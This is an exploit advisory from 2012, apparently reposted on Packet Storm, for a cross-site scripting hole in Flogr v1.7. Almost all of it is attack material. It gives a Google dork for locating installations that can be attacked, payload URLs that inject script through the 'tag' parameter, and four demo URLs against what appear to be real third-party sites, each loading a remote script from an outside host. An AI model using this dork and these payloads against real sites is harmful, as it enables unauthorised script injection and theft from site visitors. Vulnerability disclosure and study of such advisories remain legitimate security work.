Flogr version 1.7 suffers from a cross site scripting vulnerability.
9797ee9f4c0b62070aefef551e7d26994a1a9a51793c28e57deb42b5f2aa72f0#############################################################################################
# #
# Exploit Title : Flogr V1.7 Xss Vulnerability #
# #
# Author : Iranian Security & Research Team #
# #
# Discovered By : Nafsh #
# #
# Home : sec-lab.ir #
# #
# Contact : research [at] sec-lab [dot] ir #
# #
# Date : 23/1/2012 - 16:00 #
# #
# Source : www.flogr.googlecode.com #
# #
# DorK : inurl:"tag=" "powered by flogr v1.7" #
# #
#############################################################################################
# #
# Expl0iTs: #
# #
# http://[TARGET]/recent.php?tag=[xss] #
# #
# http://[TARGET]/index.php?tag=[xss] #
# #
#############################################################################################
# #
# Dem0 : #
# #
# fotos.pecesama.net/recent.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E #
# #
# localsrock.com/bigpictureproject/index.php?tag=<script src%3d//ckers.org/s></script> #
# #
# rowmanitoba.ca/flogr-1.7.2/recent.php?tag=<script src%3d//ckers.org/s></script> #
# #
# john.org.ua/recent.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E #
# #
#############################################################################################
# #
# We are : K0242 | Nafsh | Ehram.shahmohamadi #
# #
# Greetz : All sec-lab researchers #
# #
#############################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed